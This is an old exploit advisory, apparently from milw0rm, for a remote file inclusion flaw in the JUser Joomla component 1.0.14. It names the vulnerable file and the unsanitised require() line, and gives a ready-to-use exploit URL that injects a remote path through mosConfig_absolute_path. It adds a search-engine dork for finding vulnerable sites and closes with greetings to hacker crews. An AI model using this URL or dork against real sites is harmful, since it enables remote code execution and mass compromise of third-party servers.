================================================================================================================================== # JUser Joomla Component 1.0.14 Remote File Include Vulnerability Component : com_juser version 1.0.14 - paid component Vendor : www.joomlaequipment.com Discovered by : NoGe Contact : pace[dot]noge[at]hotmail[dot]com ================================================================================================================================== # Vulnerable file /administrator/components/com_juser/xajax_functions.php line 4 require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php'); # Exploit http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode] # D0rk inurl:com_juser ================================================================================================================================== # Greetz all crew #papuahacker #baliemhackerlink #nyubicrew skulmatic OLiBekaS ulga Cungkee nyubi k1tk4t str0ke newbie yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ haliq http://kapukvalley.net member ================================================================================================================================== # milw0rm.com [2007-11-19]